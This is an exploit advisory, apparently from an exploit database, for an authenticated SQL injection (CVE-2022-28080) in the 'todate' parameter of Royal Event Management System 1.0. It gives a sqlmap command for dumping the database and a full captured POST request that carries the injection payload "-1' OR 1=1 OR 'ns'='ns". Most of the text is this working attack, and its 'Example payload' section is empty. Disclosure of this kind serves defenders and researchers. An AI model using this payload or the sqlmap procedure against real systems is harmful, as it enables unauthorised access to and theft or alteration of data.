# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)  
# Date: 2022-26-03  
# Exploit Author: Eren Gozaydin  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51  
# CVE: CVE-2022-28080  
# References:  
1. Description:  
Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in  
/royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise  
the application, access or modify data, or exploit latent vulnerabilities  
in the underlying database.  
2. Proof of Concept:  
In Burpsuite intercept the request from the affected page with  
'todate' parameter and save it like poc.txt. Then run SQLmap to extract the  
data from the database:  
sqlmap -r poc.txt --dbms=mysql  
3. Example payload:  
4. Burpsuite request:  
POST /royal_event/btndates_report.php#?= HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 334  
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0  
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380  
Referer: http://localhost/royal_event/btndates_report.php#?=  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36  
Content-Disposition: form-data; name="todate"  
-1' OR 1=1 OR 'ns'='ns  
Content-Disposition: form-data; name="search"  
Content-Disposition: form-data; name="fromdate"